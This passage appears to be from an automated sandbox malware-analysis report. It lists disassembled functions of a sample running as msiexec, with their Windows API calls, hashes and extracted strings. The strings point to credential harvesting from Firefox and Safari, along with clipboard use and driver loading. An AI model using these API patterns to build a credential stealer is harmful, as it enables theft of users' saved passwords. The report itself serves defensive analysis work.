                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1213725291-0
                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                    • free.MSVCRT ref: 00418370
                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 2360000266-2664311388
                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                    Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                    • String ID:
                                                                    • API String ID: 2628231878-0
                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                    Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: NtdllProc_Window
                                                                    • String ID:
                                                                    • API String ID: 4255912815-0
                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • memset.MSVCRT ref: 0040265F
                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                    • API String ID: 577499730-1134094380
                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                    • API String ID: 2787044678-1921111777
                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                    • GetDC.USER32 ref: 004140E3
                                                                    • wcslen.MSVCRT ref: 00414123
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 2080319088-3046471546
                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                    • memset.MSVCRT ref: 00413292
                                                                    • memset.MSVCRT ref: 004132B4
                                                                    • memset.MSVCRT ref: 004132CD
                                                                    • memset.MSVCRT ref: 004132E1
                                                                    • memset.MSVCRT ref: 004132FB
                                                                    • memset.MSVCRT ref: 00413310
                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                    • memset.MSVCRT ref: 004133C0
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                    Strings
                                                                    • {Unknown}, xrefs: 004132A6
                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                    • API String ID: 4111938811-1819279800
                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                    • String ID:
                                                                    • API String ID: 829165378-0
                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                    • memset.MSVCRT ref: 00404200
                                                                    • memset.MSVCRT ref: 00404215
                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 0040426E
                                                                    • memset.MSVCRT ref: 004042CD
                                                                    • memset.MSVCRT ref: 004042E2
                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                    • API String ID: 2454223109-1580313836
                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                    • API String ID: 4054529287-3175352466
                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                    • API String ID: 3143752011-1996832678
                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                    • API String ID: 667068680-2887671607
                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
